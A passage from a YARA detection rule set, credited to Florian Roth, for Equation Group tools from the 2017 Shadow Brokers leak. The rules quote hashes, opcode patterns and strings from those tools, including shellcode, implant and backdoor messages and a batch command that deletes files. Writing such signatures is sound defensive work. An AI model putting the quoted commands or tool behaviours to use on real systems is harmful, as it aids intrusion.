$x1 = "[-] Are you being redirectect? Need to retarget?" fullword ascii $x2 = "[+] IIS Target OS: %s" fullword ascii condition: ( uint16(0) == 0x5a4d and filesize < 60KB and 1 of them ) } rule EquationGroup_Toolset_Apr17_Namedpipetouch_2_0_0 { meta: description = "Detects EquationGroup Tool - April Leak" author = "Florian Roth" reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation" date = "2017-04-15" hash1 = "cb5849fcbc473c7df886828d225293ffbd8ee58e221d03b840fd212baeda6e89" hash2 = "043d1c9aae6be65f06ab6f0b923e173a96b536cf84e57bfd7eeb9034cd1df8ea" strings: $s1 = "[*] Summary: %d pipes found" fullword ascii $s3 = "[+] Testing %d pipes" fullword ascii $s6 = "[-] Error on SMB startup, aborting" fullword ascii $s12 = "92a761c29b946aa458876ff78375e0e28bc8acb0" fullword ascii $op1 = { 68 10 10 40 00 56 e8 e1 } condition: ( uint16(0) == 0x5a4d and filesize < 40KB and 2 of them ) } rule EquationGroup_Toolset_Apr17_Easybee_1_0_1 { meta: description = "Detects EquationGroup Tool - April Leak" author = "Florian Roth" reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation" date = "2017-04-15" hash1 = "59c17d6cb564edd32c770cd56b5026e4797cf9169ff549735021053268b31611" strings: $x1 = "@@for /f \"delims=\" %%i in ('findstr /smc:\"%s\" *.msg') do if not \"%%MsgFile1%%\"==\"%%i\" del /f \"%%i\"" fullword ascii $x2 = "Logging out of WebAdmin (as target account)" fullword ascii condition: ( uint16(0) == 0x5a4d and filesize < 200KB and 1 of them ) } rule EquationGroup_Toolset_Apr17_Regread_1_1_1 { meta: description = "Detects EquationGroup Tool - April Leak" author = "Florian Roth" reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation" date = "2017-04-15" hash1 = "722f034ba634f45c429c7dafdbff413c08976b069a6b30ec91bfa5ce2e4cda26" strings: $s1 = "[+] Connected to the Registry Service" fullword ascii $s2 = "f08d49ac41d1023d9d462d58af51414daff95a6a" fullword ascii condition: ( uint16(0) == 0x5a4d and filesize < 80KB and 1 of them ) } rule EquationGroup_Toolset_Apr17_Englishmansdentist_1_2_0 { meta: description = "Detects EquationGroup Tool - April Leak" author = "Florian Roth" reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation" date = "2017-04-15" hash1 = "2a6ab28885ad7d5d64ac4c4fb8c619eca3b7fb3be883fc67c90f3ea9251f34c6" strings: $x1 = "[+] CheckCredentials(): Checking to see if valid username/password" fullword ascii $x2 = "Error connecting to target, TbMakeSocket() %s:%d." fullword ascii condition: ( uint16(0) == 0x5a4d and filesize < 200KB and 1 of them ) } rule EquationGroup_Toolset_Apr17_Architouch_Eternalsynergy_Smbtouch { meta: description = "Detects EquationGroup Tool - April Leak" author = "Florian Roth" reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation" date = "2017-04-15" super_rule = 1 hash1 = "444979a2387530c8fbbc5ddb075b15d6a4717c3435859955f37ebc0f40a4addc" hash2 = "92c6a9e648bfd98bbceea3813ce96c6861487826d6b2c3d462debae73ed25b34" hash3 = "108243f61c53f00f8f1adcf67c387a8833f1a2149f063dd9ef29205c90a3c30a" strings: $s1 = "NtErrorMoreProcessingRequired" fullword ascii $s2 = "Command Format Error: Error=%x" fullword ascii $s3 = "NtErrorPasswordRestriction" fullword ascii $op0 = { 8a 85 58 ff ff ff 88 43 4d } condition: ( uint16(0) == 0x5a4d and filesize < 600KB and 2 of them ) } rule EquationGroup_Toolset_Apr17_Eternalromance_2 { meta: description = "Detects EquationGroup Tool - April Leak" author = "Florian Roth" reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation" date = "2017-04-15" super_rule = 1 hash1 = "f1ae9fdbb660aae3421fd3e5b626c1e537d8e9ee2f9cd6d56cb70b6878eaca5d" hash2 = "b99c3cc1acbb085c9a895a8c3510f6daaf31f0d2d9ccb8477c7fb7119376f57b" hash3 = "92c6a9e648bfd98bbceea3813ce96c6861487826d6b2c3d462debae73ed25b34" strings: $x1 = "[+] Backdoor shellcode written" fullword ascii $x2 = "[*] Attempting exploit method %d" fullword ascii condition: ( uint16(0) == 0x5a4d and filesize < 600KB and 1 of them ) } rule EquationGroup_Toolset_Apr17__Emphasismine { meta: description = "Detects EquationGroup Tool - April Leak" author = "Florian Roth" reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation" date = "2017-04-15" super_rule = 1 hash1 = "dcaf91bd4af7cc7d1fb24b5292be4e99c7adf4147892f6b3b909d1d84dd4e45b" hash2 = "348eb0a6592fcf9da816f4f7fc134bcae1b61c880d7574f4e19398c4ea467f26" strings: $x1 = "Error: Could not calloc() for shellcode buffer" fullword ascii $x2 = "shellcodeSize: 0x%04X + 0x%04X + 0x%04X = 0x%04X" fullword ascii $x3 = "Generating shellcode" fullword ascii $x4 = "([0-9a-zA-Z]+) OK LOGOUT completed" fullword ascii $x5 = "Error: Domino is not the expected version. (%s, %s)" fullword ascii condition: ( uint16(0) == 0x5a4d and filesize < 100KB and 1 of them ) } rule EquationGroup_Toolset_Apr17_Eternalromance { meta: description = "Detects EquationGroup Tool - April Leak" author = "Florian Roth" reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation" date = "2017-04-15" super_rule = 1 hash1 = "f1ae9fdbb660aae3421fd3e5b626c1e537d8e9ee2f9cd6d56cb70b6878eaca5d" hash2 = "b99c3cc1acbb085c9a895a8c3510f6daaf31f0d2d9ccb8477c7fb7119376f57b" strings: $x1 = "[-] Error: Exploit choice not supported for target OS!!" fullword ascii $x2 = "Error: Target machine out of NPP memory (VERY BAD!!) - Backdoor removed" fullword ascii $x3 = "[-] Error: Backdoor not present on target" fullword ascii $x4 = "*********** TARGET ARCHITECTURE IS X64 ************" fullword ascii condition: ( uint16(0) == 0x5a4d and filesize < 200KB and 1 of them ) or 2 of them } rule EquationGroup_Toolset_Apr17_Gen4 { meta: description = "Detects EquationGroup Tool - April Leak" author = "Florian Roth" reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation" date = "2017-04-15" super_rule = 1 hash1 = "fe7ce2fdb245c62e4183c728bc97e966a98fdc8ffd795ed09da23f96e85dcdcd" hash2 = "0989bfe351342a7a1150b676b5fd5cbdbc201b66abcb23137b1c4de77a8f61a6" hash3 = "270850303e662be53d90fa60a9e5f4bd2bfb95f92a046c77278257631d9addf4" hash4 = "7a086c0acb6df1fa304c20733f96e898d21ca787661270f919329fadfb930a6e" hash5 = "c236e0d9c5764f223bd3d99f55bd36528dfc0415e14f5fde1e5cdcada14f4ec0" hash6 = "9d98e044eedc7272823ba8ed80dff372fde7f3d1bece4e5affb21e16f7381eb2" hash7 = "dfce29df4d198c669a87366dd56a7426192481d794f71cd5bb525b08132ed4f7" hash8 = "87fdc6c32b9aa8ae97c7efbbd5c9ae8ec5595079fc1488f433beef658efcb4e9" hash9 = "722f034ba634f45c429c7dafdbff413c08976b069a6b30ec91bfa5ce2e4cda26" hash10 = "d94b99908f528fa4deb56b11eac29f6a6e244a7b3aac36b11b807f2f74c6d8be" hash11 = "4b07d9d964b2c0231c1db7526237631bb83d0db80b3c9574cc414463703462d3" hash12 = "30b63abde1e871c90df05137ec08df3fa73dedbdb39cb4bd2a2df4ca65bc4e53" hash13 = "02c1b08224b7ad4ac3a5b7b8e3268802ee61c1ec30e93e392fa597ae3acc45f7" hash14 = "690f09859ddc6cd933c56b9597f76e18b62a633f64193a51f76f52f67bc2f7f0" strings: $x1 = "[+] \"TargetPort\" %hu" fullword ascii $x2 = "---<<< Complete >>>---" fullword ascii $x3 = "[+] \"NetworkTimeout\" %hu" fullword ascii $op1 = { 46 83 c4 0c 83 fe 0c 0f 8c 5e ff ff ff b8 } condition: ( uint16(0) == 0x5a4d and filesize < 150KB and ( 1 of ($x*) or 2 of them ) ) } rule EquationGroup_Toolset_Apr17_Gen1 { meta: description = "Detects EquationGroup Tool - April Leak" author = "Florian Roth" reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation" date = "2017-04-15" super_rule = 1 hash1 = "1b5b33931eb29733a42d18d8ee85b5cd7d53e81892ff3e60e2e97f3d0b184d31" hash2 = "139697168e4f0a2cc73105205c0ddc90c357df38d93dbade761392184df680c7" strings: $x1 = "Restart with the new protocol, address, and port as target." fullword ascii $x2 = "TargetPort : %s (%u)" fullword ascii $x3 = "Error: strchr() could not find '@' in account name." fullword ascii $x4 = "TargetAcctPwd : %s" fullword ascii $x5 = "Creating CURL connection handle..." fullword ascii condition: ( uint16(0) == 0x5a4d and filesize < 80KB and 1 of them ) } rule EquationGroup_Toolset_Apr17_Gen2 { meta: description = "Detects EquationGroup Tool - April Leak" author = "Florian Roth" reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation" date = "2017-04-15" super_rule = 1 hash1 = "7fe425cd040608132d4f4ab2671e04b340a102a20c97ffdcf1b75be43a9369b5" hash2 = "561c0d4fc6e0ff0a78613d238c96aed4226fbb7bb9ceea1d19bc770207a6be1e" hash3 = "f2e90e04ddd05fa5f9b2fec024cd07365aebc098593d636038ebc2720700662b" hash4 = "8f7e10a8eedea37ee3222c447410fd5b949bd352d72ef22ef0b2821d9df2f5ba" strings: $s1 = "[+] Setting password : (NULL)" fullword ascii $s2 = "[-] TbBuffCpy() failed!" fullword ascii $s3 = "[+] SMB negotiation" fullword ascii $s4 = "12345678-1234-ABCD-EF00-0123456789AB" fullword ascii $s5 = "Value must end with 0000 (2 NULLs)" fullword ascii $s6 = "[*] Configuring Payload" fullword ascii $s7 = "[*] Connecting to listener" fullword ascii $op1 = { b0 42 40 00 89 44 24 30 c7 44 24 34 } $op2 = { eb 59 8b 4c 24 10 68 1c 46 } condition: ( uint16(0) == 0x5a4d and filesize < 80KB and 1 of ($s*) and 1 of ($op*) ) or 3 of them } rule EquationGroup_Toolset_Apr17_Gen3 { meta: description = "Detects EquationGroup Tool - April Leak" author = "Florian Roth" reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation" date = "2017-04-15" super_rule = 1 hash1 = "270850303e662be53d90fa60a9e5f4bd2bfb95f92a046c77278257631d9addf4" hash2 = "7a086c0acb6df1fa304c20733f96e898d21ca787661270f919329fadfb930a6e" hash3 = "c236e0d9c5764f223bd3d99f55bd36528dfc0415e14f5fde1e5cdcada14f4ec0" hash4 = "9d98e044eedc7272823ba8ed80dff372fde7f3d1bece4e5affb21e16f7381eb2" hash5 = "dfce29df4d198c669a87366dd56a7426192481d794f71cd5bb525b08132ed4f7" hash6 = "87fdc6c32b9aa8ae97c7efbbd5c9ae8ec5595079fc1488f433beef658efcb4e9" hash7 = "722f034ba634f45c429c7dafdbff413c08976b069a6b30ec91bfa5ce2e4cda26" hash8 = "d94b99908f528fa4deb56b11eac29f6a6e244a7b3aac36b11b807f2f74c6d8be" hash9 = "4b07d9d964b2c0231c1db7526237631bb83d0db80b3c9574cc414463703462d3" hash10 = "30b63abde1e871c90df05137ec08df3fa73dedbdb39cb4bd2a2df4ca65bc4e53" hash11 = "02c1b08224b7ad4ac3a5b7b8e3268802ee61c1ec30e93e392fa597ae3acc45f7" hash12 = "690f09859ddc6cd933c56b9597f76e18b62a633f64193a51f76f52f67bc2f7f0" strings: $s1 = "Logon failed. Kerberos ticket not yet valid (target and KDC times not synchronized)" fullword ascii $s2 = "[-] Could not set \"CredentialType\"" fullword ascii $op1 = { 46 83 c4 0c 83 fe 0c 0f 8c 5e ff ff ff b8 } condition: ( uint16(0) == 0x5a4d and filesize < 150KB and 2 of them ) } /* Yara Rule Set Author: Florian Roth Date: 2017-04-15 Identifier: Equation Group Tools - Resource Folder Reference: https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation */ /* Rule Set ----------------------------------------------------------------- */ rule EquationGroup_Toolset_Apr17_yak { meta: description = "Detects EquationGroup Tool - April Leak" author = "Florian Roth" reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation" date = "2017-04-15" hash1 = "66ff332f84690642f4e05891a15bf0c9783be2a64edb2ef2d04c9205b47deb19" strings: $x1 = "-xd = dump archive data & store in scancodes.txt" fullword ascii $x2 = "-------- driver start token -------" fullword wide $x3 = "-------- keystart token -------" fullword wide $x4 = "-xta = same as -xt but show special chars & store in keys_all.txt" fullword ascii condition: ( uint16(0) == 0x5a4d and filesize < 800KB and 2 of them ) } rule EquationGroup_Toolset_Apr17_AdUser_Implant { meta: description = "Detects EquationGroup Tool - April Leak" author = "Florian Roth" reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation" date = "2017-04-15" hash1 = "fd2efb226969bc82e2e38769a10a8a751138db69f4594a8de4b3c0522d4d885f" strings: $s1 = ".?AVFeFinallyFailure@@" fullword ascii $s2 = "(&(objectCategory=person)(objectClass=user)(cn=" fullword wide condition: ( uint16(0) == 0x5a4d and filesize < 40KB and all of them ) } rule EquationGroup_Toolset_Apr17_RemoteExecute_Implant { meta: description = "Detects EquationGroup Tool - April Leak" author = "Florian Roth" reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation" date = "2017-04-15" hash1 = "770663c07c519677316934cf482e500a73540d9933342c425f3e56258e6e6d8b" strings: $op1 = { 53 00 63 00 68 00 65 00 64 00 75 00 6C 00 65 00 00 00 00 00 53 00 65 00 72 00 76 00 69 00 63 00 65 00 73 00 41 00 63 00 74 00 69 00 76 00 65 00 00 00 00 00 FF FF FF FF 00 00 00 00 B0 17 00 68 5C 00 70 00 69 00 70 00 65 00 5C 00 53 00 65 00 63 00 6F 00 6E 00 64 00 61 00 72 00 79 00 4C 00 6F 00 67 00 6F 00 6E 00 00 00 00 00 5C 00 00 00 57 00 69 00 6E 00 53 00 74 00 61 00 30 00 5C 00 44 00 65 00 66 00 61 00 75 00 6C 00 74 00 00 00 6E 00 63 00 61 00 63 00 6E 00 5F 00 6E 00 70 00 00 00 00 00 5C 00 70 00 69 00 70 00 65 00 5C 00 53 00 45 00 43 00 4C 00 4F 00 47 00 4F 00 4E } condition: ( uint16(0) == 0x5a4d and filesize < 40KB and all of them ) } rule EquationGroup_Toolset_Apr17_Banner_Implant9x { meta: description = "Detects EquationGroup Tool - April Leak" author = "Florian Roth" reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation" date = "2017-04-15" hash1 = "5d69a8cfc9b636448f023fcf18d111f13a8e6bcb9a693eb96276e0d796ab4e0c" strings: $s1 = ".?AVFeFinallyFailure@@" fullword ascii $op1 = { c9 c3 57 8d 85 2c eb ff ff } condition: ( uint16(0) == 0x5a4d and filesize < 20KB and all of them ) } rule EquationGroup_Toolset_Apr17_greatdoc_dll_config { meta: description = "Detects EquationGroup Tool - April Leak" author = "Florian Roth" reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation" date = "2017-04-15" hash1 = "fd9d0abfa727784dd07562656967d220286fc0d63bcf7e2c35d4c02bc2e5fc2e" strings: $x1 = "C:\\Projects\\GREATERDOCTOR\\trunk\\GREATERDOCTOR" ascii $x2 = "src\\build\\Release\\dllConfig\\dllConfig.pdb" ascii $x3 = "GREATERDOCTOR [ commandline args configuration ]" fullword ascii $x4 = "-useage: <scanner> \"<cmdline args>\"" fullword ascii condition: ( uint16(0) == 0x5a4d and filesize < 200KB and 1 of them ) } rule EquationGroup_Toolset_Apr17_scanner { meta: description = "Detects EquationGroup Tool - April Leak" author = "Florian Roth" reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation" date = "2017-04-15" hash1 = "f180bdb247687ea9f1b58aded225d5c80a13327422cd1e0515ea891166372c53" strings: $x1 = "+daemon_version,system,processor,refid,clock" fullword ascii $x2 = "Usage: %s typeofscan IP_address" fullword ascii $x3 = "# scanning ip %d.%d.%d.%d" fullword ascii $x4 = "Welcome to the network scanning tool" fullword ascii $x5 = "***** %s ***** (length %d)" fullword ascii condition: ( uint16(0) == 0x5a4d and filesize < 90KB and 1 of them ) } rule EquationGroup_Toolset_Apr17_Mcl_NtMemory_Std { meta: description = "Detects EquationGroup Tool - April Leak" author = "Florian Roth" reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation" date = "2017-04-15" hash1 = "087db4f2dbf8e0679de421fec8fb2e6dd50625112eb232e4acc1408cc0bcd2d7" strings: $op1 = { 44 24 37 50 c6 44 24 38 72 c6 44 } $op2 = { 44 24 33 6f c6 44 24 34 77 c6 } $op3 = { 3b 65 c6 44 24 3c 73 c6 44 24 3d 73 c6 44 24 3e } condition: ( uint16(0) == 0x5a4d and filesize < 300KB and all of them ) } rule EquationGroup_Toolset_Apr17_tacothief { meta: description = "Detects EquationGroup Tool - April Leak" author = "Florian Roth" reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation" date = "2017-04-15" hash1 = "c71953cc84c27dc61df8f6f452c870a7880a204e9e21d9fd006a5c023b052b35" strings: $x1 = "File too large! Must be less than 655360 bytes." fullword ascii condition: ( uint16(0) == 0x5a4d and filesize < 100KB and all of them ) } rule EquationGroup_Toolset_Apr17_ntevt { meta: description = "Detects EquationGroup Tool - April Leak" author = "Florian Roth" reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation" date = "2017-04-15" hash1 = "4254ee5e688fc09bdc72bcc9c51b1524a2bb25a9fb841feaf03bc7ec1a9975bf" strings: $x1 = "c:\\ntevt.pdb" fullword ascii $s1 = "ARASPVU" fullword ascii $op1 = { 41 5a 41 59 41 58 5f 5e 5d 5a 59 5b 58 48 83 c4 } $op2 = { f9 48 03 fa 48 33 c0 8a 01 49 03 c1 49 f7 e0 88 } $op3 = { 01 41 f6 e0 49 03 c1 88 01 48 33 } condition: ( uint16(0) == 0x5a4d and filesize < 700KB and $x1 or 3 of them ) } rule EquationGroup_Toolset_Apr17_Processes_Target { meta: description = "Detects EquationGroup Tool - April Leak" author = "Florian Roth" reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation" date = "2017-04-15" hash1 = "69cf7643dbecc5f9b4b29edfda6c0295bc782f0e438f19be8338426f30b4cc74" strings: $s1 = "Select * from Win32_Process" fullword ascii $s3 = "\\\\%ls\\root\\cimv2" fullword wide $s5 = "%4ls%2ls%2ls%2ls%2ls%2ls.%11l[0-9]%1l[+-]%6s" fullword wide condition: ( uint16(0) == 0x5a4d and filesize < 200KB and 2 of them ) } rule EquationGroup_Toolset_Apr17_st_lp { meta: description = "Detects EquationGroup Tool - April Leak" author = "Florian Roth" reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation" date = "2017-04-15" hash1 = "3b6f756cca096548dcad2b6c241c1dafd16806c060bec82a530f4d38755286a2" strings: $x1 = "Previous command: set injection processes (status=0x%x)" fullword ascii $x2 = "Secondary injection process is <null> [no secondary process will be used]" fullword ascii $x3 = "Enter the address to be used as the spoofed IP source address (xxx.xxx.xxx.xxx) -> " fullword ascii $x4 = "E: Execute a Command on the Implant" fullword ascii condition: ( uint16(0) == 0x5a4d and filesize < 300KB and 1 of them ) } rule EquationGroup_Toolset_Apr17_FullThreadDump { meta: description = "Detects EquationGroup Tool - April Leak" author = "Florian Roth" reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation" date = "2017-04-15" hash1 = "b68f3f32bfa6cf11145c9fb9bf0075a5ca3938ea218b1cc29ad62f7b9e043255" strings: $s1 = "FullThreadDump.class" fullword ascii $s2 = "ThreadMonitor.class" fullword ascii $s3 = "Deadlock$DeadlockThread.class" fullword ascii condition: ( uint16(0) == 0x4b50 and filesize < 30KB and all of them ) } rule EquationGroup_Toolset_Apr17_EpWrapper { meta: description = "Detects EquationGroup Tool - April Leak" author = "Florian Roth" reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation" date = "2017-04-15" hash1 = "a8eed17665ee22198670e22458eb8c9028ff77130788f24f44986cce6cebff8d" strings: $x1 = "* Failed to get remote TCP socket address" fullword wide $x2 = "* Failed to get 'LPStart' export" fullword wide $s5 = "Usage: %ls <logdir> <dll_search_path> <dll_to_load_path> <socket>" fullword wide condition: ( uint16(0) == 0x5a4d and filesize < 20KB and 1 of them ) } rule EquationGroup_Toolset_Apr17_DiBa_Target_2000 { meta: description = "Detects EquationGroup Tool - April Leak" author = "Florian Roth" reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation" date = "2017-04-15" hash1 = "f9ea8ff5985b94f635d03f3aab9ad4fb4e8c2ad931137dba4f8ee8a809421b91" strings: $s1 = "0M1U1Z1p1" fullword ascii $op1 = { f4 65 c6 45 f5 6c c6 45 f6 33 c6 45 f7 32 c6 45 } $op2 = { 36 c6 45 e6 34 c6 45 e7 50 c6 45 e8 72 c6 45 e9 } $op3 = { c6 45 e8 65 c6 45 e9 70 c6 45 ea 74 c6 45 eb 5f } condition: ( uint16(0) == 0x5a4d and filesize < 1000KB and 3 of them ) } rule EquationGroup_Toolset_Apr17_DllLoad_Target { meta: description = "Detects EquationGroup Tool - April Leak" author = "Florian Roth" reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation" date = "2017-04-15" hash1 = "a42d5201af655e43cefef30d7511697e6faa2469dc4a74bc10aa060b522a1cf5" strings: $s1 = "BzWKJD+" fullword ascii $op1 = { 44 24 6c 6c 88 5c 24 6d } $op2 = { 44 24 54 63 c6 44 24 55 74 c6 44 24 56 69 } $op3 = { 44 24 5c 6c c6 44 24 5d 65 c6 44 24 5e } condition: ( uint16(0) == 0x5a4d and filesize < 200KB and all of them ) } rule EquationGroup_Toolset_Apr17_EXPA { meta: description = "Detects EquationGroup Tool - April Leak" author = "Florian Roth" reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation" date = "2017-04-15" hash1 = "2017176d3b5731a188eca1b71c50fb938c19d6260c9ff58c7c9534e317d315f8" strings: $x1 = "* The target is IIS 6.0 but is not running content indexing servicess," fullword ascii $x2 = "--ver 6 --sp <service_pack> --lang <language> --attack shellcode_option[s]sL" fullword ascii $x3 = "By default, the shellcode will attempt to immediately connect s$" fullword ascii $x4 = "UNEXPECTED SHELLCODE CONFIGURATION ERRORs" fullword ascii condition: ( uint16(0) == 0x5a4d and filesize < 12000KB and 1 of them ) } rule EquationGroup_Toolset_Apr17_RemoteExecute_Target { meta: description = "Detects EquationGroup Tool - April Leak" author = "Florian Roth" reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation" date = "2017-04-15" hash1 = "4a649ca8da7b5499821a768c650a397216cdc95d826862bf30fcc4725ce8587f" strings: $s1 = "Win32_Process" fullword ascii $s2 = "\\\\%ls\\root\\cimv2" fullword wide $op1 = { 83 7b 18 01 75 12 83 63 } condition: ( uint16(0) == 0x5a4d and filesize < 200KB and all of them ) } rule EquationGroup_Toolset_Apr17_DS_ParseLogs { meta: description = "Detects EquationGroup Tool - April Leak" author = "Florian Roth" reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation" date = "2017-04-15" hash1 = "0228691d63038b072cdbf50782990d505507757efbfa87655bb2182cf6375956" strings: $x1 = "* Size (%d) of remaining capture file is too small to contain a valid header" fullword wide $x2 = "* Capture header not found at start of buffer" fullword wide $x3 = "Usage: %ws <capture_file> <results_prefix>" fullword wide condition: ( uint16(0) == 0x5a4d and filesize < 100KB and 1 of them ) } rule EquationGroup_Toolset_Apr17_Oracle_Implant { meta: description = "Detects EquationGroup Tool - April Leak" author = "Florian Roth" reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation" date = "2017-04-15" hash1 = "8e9be4960c62ed7f210ce08f291e410ce0929cd3a86fe70315d7222e3df4587e" strings: $op0 = { fe ff ff ff 48 89 9c 24 80 21 00 00 48 89 ac 24 } $op1 = { e9 34 11 00 00 b8 3e 01 00 00 e9 2a 11 00 00 b8 } $op2 = { 48 8b ca e8 bf 84 00 00 4c 8b e0 8d 34 00 44 8d } condition: ( uint16(0) == 0x5a4d and filesize < 500KB and all of them ) } rule EquationGroup_Toolset_Apr17_DmGz_Target { meta: description = "Detects EquationGroup Tool - April Leak" author = "Florian Roth" reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation" date = "2017-04-15" hash1 = "5964966041f93d5d0fb63ce4a85cf9f7a73845065e10519b0947d4a065fdbdf2" strings: $s1 = "\\\\.\\%ls" fullword ascii $s3 = "6\"6<6C6H6M6Z6f6t6" fullword ascii condition: ( uint16(0) == 0x5a4d and filesize < 80KB and all of them ) } rule EquationGroup_Toolset_Apr17_SetResourceName { meta: description = "Detects EquationGroup Tool - April Leak" author = "Florian Roth" reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation" date = "2017-04-15" hash1 = "537793d5158aecd0debae25416450bd885725adfc8ca53b0577a3df4b0222e2e" strings: $x1 = "Updates the name of the dll or executable in the resource file" fullword ascii $x2 = "*NOTE: SetResourceName does not work with PeddleCheap versions" fullword ascii $x3 = "2 = [appinit.dll] level4 dll" fullword ascii $x4 = "1 = [spcss32.exe] level3 exe" fullword ascii condition: ( uint16(0) == 0x5a4d and filesize < 100KB and 1 of them ) } rule EquationGroup_Toolset_Apr17_drivers_Implant { meta: description = "Detects EquationGroup Tool - April Leak" author = "Florian Roth" reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation" date = "2017-04-15" hash1 = "ee8b048f1c6ba821d92c15d614c2d937c32aeda7b7ea0943fd4f640b57b1c1ab" strings: $s1 = ".?AVFeFinallyFailure@@" fullword ascii $s2 = "hZwLoadDriver" fullword ascii $op1 = { b0 01 e8 58 04 00 00 c3 33 } condition: ( uint16(0) == 0x5a4d and filesize < 30KB and all of them ) } rule EquationGroup_Toolset_Apr17_Shares_Target { meta: description = "Detects EquationGroup Tool - April Leak" author = "Florian Roth" reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation" date = "2017-04-15" hash1 = "6c57fb33c5e7d2dee415ae6168c9c3e0decca41ffe023ff13056ff37609235cb" strings: $s1 = "Select * from Win32_Share" fullword ascii $s2 = "slocalhost" fullword wide $s3 = "\\\\%ls\\root\\cimv2" fullword wide $s4 = "\\\\%ls\\%ls" fullword ascii condition: ( uint16(0) == 0x5a4d and filesize < 200KB and all of them ) } rule EquationGroup_Toolset_Apr17_DUMPEL { meta: description = "Detects EquationGroup Tool - April Leak" author = "Florian Roth" reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation" date = "2017-04-15" hash1 = "bf42532be2d36f522dca7d3d3eb40b1d25c33d508a5a37c7e28f148945136dc6" strings: $x1 = "dumpel -f file [-s \\\\server]" fullword ascii $x2 = "records will not appear in the dumped log." fullword ascii $x3 = "obj\\i386\\Dumpel.exe" fullword ascii $s13 = "DUMPEL Usage: " fullword ascii condition: ( uint16(0) == 0x5a4d and filesize < 200KB and 1 of them ) } rule EquationGroup_Toolset_Apr17_ntfltmgr { meta: description = "Detects EquationGroup Tool - April Leak" author = "Florian Roth" reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation" date = "2017-04-15" hash1 = "3df61b8ef42a995b8f15a0d38bc51f2f08f8d9a2afa1afc94c6f80671cf4a124" hash2 = "f7a886ee10ee6f9c6be48c20f370514be62a3fd2da828b0dff44ff3d485ff5c5" hash3 = "980954a2440122da5840b31af7e032e8a25b0ce43e071ceb023cca21cedb2c43" strings: $s3 = "wCw3wDwAw2wNw@wEwZw2wDwEwBwZwFwFw4w2wZw5w1w4wFwZwGwOwGwGwEw5w2wFwGwDwFwOw" fullword ascii $s6 = "w+w;w2w0w6w4w.w(wRw" fullword ascii $op1 = { 80 f7 ff ff 49 89 84 34 18 02 00 00 41 83 a4 34 } $op2 = { ff 15 0b 34 00 00 eb 92 } $op3 = { 4d 8d b4 34 08 02 00 00 4d 85 f6 0f 84 ae } $op4 = { 8b ca 2b ce 8d 34 01 0f b7 3e 66 3b 7d f0 89 75 } $op5 = { 8a 40 01 00 c7 47 70 } $op6 = { e9 3c ff ff ff 6a ff 8d 45 f0 50 e8 27 11 00 00 } $op7 = { 8b 45 08 53 57 8b 7d 0c c7 40 34 } condition: ( uint16(0) == 0x5a4d and filesize < 100KB and 4 of them ) } rule EquationGroup_Toolset_Apr17_DiBa_Target_BH { meta: description = "Detects EquationGroup Tool - April Leak" author = "Florian Roth" reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation" date = "2017-04-15" hash1 = "7ae9a247b60dc31f424e8a7a3b3f1749ba792ff1f4ba67ac65336220021fce9f" strings: $op0 = { 44 89 20 e9 40 ff ff ff 8b c2 48 8b 5c 24 60 48 } $op1 = { 45 33 c9 49 8d 7f 2c 41 ba } $op2 = { 89 44 24 34 eb 17 4c 8d 44 24 28 8b 54 24 30 48 } condition: ( uint16(0) == 0x5a4d and filesize < 2000KB and all of them ) } rule EquationGroup_Toolset_Apr17_PC_LP { meta: description = "Detects EquationGroup Tool - April Leak" author = "Florian Roth" reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation" date = "2017-04-15" hash1 = "3a505c39acd48a258f4ab7902629e5e2efa8a2120a4148511fe3256c37967296" strings: $s1 = "* Failed to get connection information. Aborting launcher!" fullword wide $s2 = "Format: <command> <target port> [lp port]" fullword wide condition: ( uint16(0) == 0x5a4d and filesize < 200KB and all of them ) } rule EquationGroup_Toolset_Apr17_RemoteCommand_Lp { meta: description = "Detects EquationGroup Tool - April Leak" author = "Florian Roth" reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation" date = "2017-04-15" hash1 = "57b47613a3b5dd820dae59fc6dc2b76656bd578f015f367675219eb842098846" strings: $s1 = "Failure parsing command from %hs:%u: os=%u 